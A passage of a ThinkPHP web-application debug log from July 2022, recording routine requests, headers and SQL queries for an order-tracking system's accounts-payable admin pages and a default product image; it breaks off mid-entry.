--------------------------------------------------------------- [ 2022-07-20T17:11:50+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020742s][吞吐率:48.21req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001229s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:50+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020615s][吞吐率:48.51req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001130s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:51+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020714s][吞吐率:48.28req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001178s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:58+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable?addtabs=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable?addtabs=1 [运行时间:0.055537s][吞吐率:18.01req/s] [内存消耗:5,256.02kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001165s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?ref=addtabs', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'addtabs' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001547s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/index.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000122s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000571s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001469s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000549s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001505s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001137s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001606s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000433s ] [ sql ] [ SQL ] SELECT `title`,`remark` FROM `ot_auth_rule` WHERE `name` = 'financial/accountspayable' LIMIT 1 [ RunTime:0.000344s ] --------------------------------------------------------------- [ 2022-07-20T17:11:58+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030152s][吞吐率:33.17req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001101s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001510s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000110s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:58+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021313s][吞吐率:46.92req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001365s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:58+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308318 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308318 [运行时间:0.032447s][吞吐率:30.82req/s] [内存消耗:3,854.70kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001137s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658308318', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001709s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:59+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030873s][吞吐率:32.39req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000067s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001115s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001768s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000134s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:59+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318502 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318502 [运行时间:0.070962s][吞吐率:14.09req/s] [内存消耗:5,683.33kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001384s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1658308318502', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001995s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000365s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001392s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000519s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001193s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001050s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001530s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000331s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001616s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000994s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.000961s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.000928s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.002482s ] --------------------------------------------------------------- [ 2022-07-20T17:12:00+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1 [运行时间:0.055766s][吞吐率:17.93req/s] [内存消耗:5,261.61kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001238s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001895s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/choosecustom.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000115s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000567s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001488s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000505s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001159s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001296s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001583s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000421s ] --------------------------------------------------------------- [ 2022-07-20T17:12:01+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308320 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308320 [运行时间:0.033009s][吞吐率:30.29req/s] [内存消耗:3,854.64kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001203s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658308320', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001627s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000111s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:01+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020758s][吞吐率:48.17req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001089s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:01+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658308320807 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658308320807 [运行时间:0.076677s][吞吐率:13.04req/s] [内存消耗:5,683.37kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000065s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001381s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1658308320807', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001634s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ 